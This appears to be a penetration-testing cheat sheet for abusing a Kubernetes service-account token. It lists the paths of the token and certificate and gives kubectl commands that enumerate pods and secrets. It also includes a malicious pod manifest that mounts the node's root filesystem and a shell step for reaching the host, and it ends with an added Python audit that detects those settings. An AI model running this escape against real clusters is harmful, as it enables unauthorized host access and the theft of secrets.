Token Location
/run/secrets/kubernetes.io/serviceaccount/token
Sample Output:
TO-DO
Certificate Location
/run/secrets/kubernetes.io/serviceaccount/ca.crt
Sample Output:
TO-DO
Basic Commands
# List all namespaces
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get namespaces
Sample Output:
TO-DO
# Get user permissions in current namespace
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> auth can-i --list
Sample Output:
TO-DO
# Get user permissions in specific namespace
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> auth can-i --list -n <NAMESPACE>
Sample Output:
TO-DO
# List all pods
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get pods --all-namespaces
Sample Output:
TO-DO
# List pods in specific namespace
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get pods -n <NAMESPACE>
Sample Output:
TO-DO
# Get YAML of a pod
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get pod <POD_NAME> -o yaml
Sample Output:
TO-DO
# Get info of a pod
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> describe pod <POD_NAME> -n <NAMESPACE>
Sample Output:
TO-DO
# List secrets
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> get secrets -n <NAMESPACE>
Sample Output:
TO-DO
# Get info of a secret
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> describe secret <SECRET_NAME> -n <NAMESPACE>
Sample Output:
TO-DO
Ref: kubectl
Abuse #1: Mount host’s file system
1. Create a Malicious YAML (Template)
apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: <NAMESPACE_NAME>
spec:
  containers:
  - name: test
    image: <IMAGE_NAME>
    command: ["/bin/sh"]
    args: ["-c", "sleep 300000"]
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
Sample Output:
TO-DO
2. Create a new pod
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> apply -f test.yaml
Sample Output:
TO-DO
3. Execute a shell in the new pod (the pod is named alpine in the manifest; test is the container name)
kubectl --token <TOKEN> --certificate-authority ca.crt --server <TARGET> exec alpine --stdin --tty -n <NAMESPACE> -- /bin/sh
Sample Output:
TO-DO
# Check host filesystem (the node's / is mounted at /mnt, so /mnt/root is the host's /root)
cd /mnt/root/
Sample Output:
TO-DO
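A defender's counterpart to the manifest in step 1, added here as an example and not part of the original page: a Python audit over a Pod object as `kubectl get pod <POD_NAME> -o json` returns it, flagging the three settings the abuse depends on (a hostPath volume of the node's root, hostNetwork, and an auto-mounted service account token). The two sample pods are constructed, with made-up image and namespace values.

```python
import json

# Constructed sample: the abuse manifest from this page as `kubectl get pod
# <POD_NAME> -o json` would return it (made-up image and namespace values).
ABUSE_POD_JSON = """{"apiVersion": "v1", "kind": "Pod",
  "metadata": {"name": "alpine", "namespace": "default"},
  "spec": {
    "containers": [{"name": "test", "image": "alpine:3.19",
                    "command": ["/bin/sh"], "args": ["-c", "sleep 300000"],
                    "volumeMounts": [{"mountPath": "/mnt", "name": "hostfs"}]}],
    "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}],
    "automountServiceAccountToken": true, "hostNetwork": true}}"""

# Constructed sample of an ordinary pod that needs none of those settings.
BENIGN_POD_JSON = """{"apiVersion": "v1", "kind": "Pod",
  "metadata": {"name": "web", "namespace": "default"},
  "spec": {"containers": [{"name": "web", "image": "nginx:1.25"}],
           "automountServiceAccountToken": false}}"""


def audit_pod(pod):
    """Return findings for the host-escape settings a Pod object carries."""
    findings = []
    spec = pod.get("spec", {})
    # Map volume name -> container mount path so a finding says where it lands.
    mounts = {m["name"]: m.get("mountPath", "?")
              for c in spec.get("containers", [])
              for m in c.get("volumeMounts", [])}
    for vol in spec.get("volumes", []):
        host_path = vol.get("hostPath")
        if host_path is None:
            continue
        path = host_path.get("path", "")
        # Mounting the node's root exposes every host file; any hostPath is risky.
        severity = "CRITICAL" if path.rstrip("/") == "" else "HIGH"
        findings.append(f"{severity}: hostPath {path!r} mounted at "
                        f"{mounts.get(vol['name'], '<unmounted>')} via volume {vol['name']!r}")
    if spec.get("hostNetwork"):
        findings.append("HIGH: hostNetwork=true shares the node's network namespace")
    # The API default is true, so an unset field still mounts the token.
    if spec.get("automountServiceAccountToken", True):
        findings.append("MEDIUM: service account token is auto-mounted into the pod")
    return findings


def audit_pod_json(text):
    """Audit a Pod given as JSON text (e.g. piped from kubectl ... -o json)."""
    return audit_pod(json.loads(text))
```

Feed the output of `kubectl get pod <POD_NAME> -n <NAMESPACE> -o json` to `audit_pod_json` to check a live pod; the same three settings are what an admission policy restricting hostPath and hostNetwork would reject at creation time, before the token in step 2 can be used to apply the manifest.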